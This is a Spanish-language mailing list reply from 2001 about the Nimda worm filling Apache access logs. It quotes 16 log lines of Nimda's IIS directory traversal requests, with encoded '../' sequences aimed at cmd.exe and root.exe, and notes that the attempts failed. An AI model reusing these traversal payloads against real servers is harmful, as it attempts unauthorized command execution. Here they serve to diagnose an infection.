[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]On Wed, 19 Sep 2001, David Alfredo Daza Padron wrote: > Me llama la atencion, pues dices que tu apache server esta registrando > en su log > este virus? lei los reportes de TrendMicro y el CERT y dicen que solo > afectan > a Win98 a 2000, podrias mandarnos una linea para conocer como registra > tu log > este virus? > gracias > > "Juarez, Jose Antonio" wrote: > > > > Alguien sabe como hacer para que el archivo access.log no se vea afectado > > por este virus...por que crece y crece.... > > aunque a mi apache no le haga nada....aqui me pego en varias maquinas y de > > momento lo unico que hago es mediante el cron, limpiarlo.....y por otro > > lado, alguna solucion para el sendmail... algo asi como la hubo para el > > redcode .... Una muestra de Nimda en accion: 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 290 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 363 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 275 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 Este es un registro de un ataque sin éxito en contra de un servidor Apache. Como veran, ejecuta un minimo de 16 'exploits' conocidos de Win+IIS para tratar de penetrar al sistema. Saludos -- (o- Cristian Othon Martinez Vera <cfuga en itam mx> Pulchrum est paucorum //\ http://eniac.rhon.itam.mx/~cfuga/ hominum. v_/_ --------------------------------------------------------------------- Lista de soporte de LinuxPPP Reglas de la lista en http://linuxppp.com/reglas.html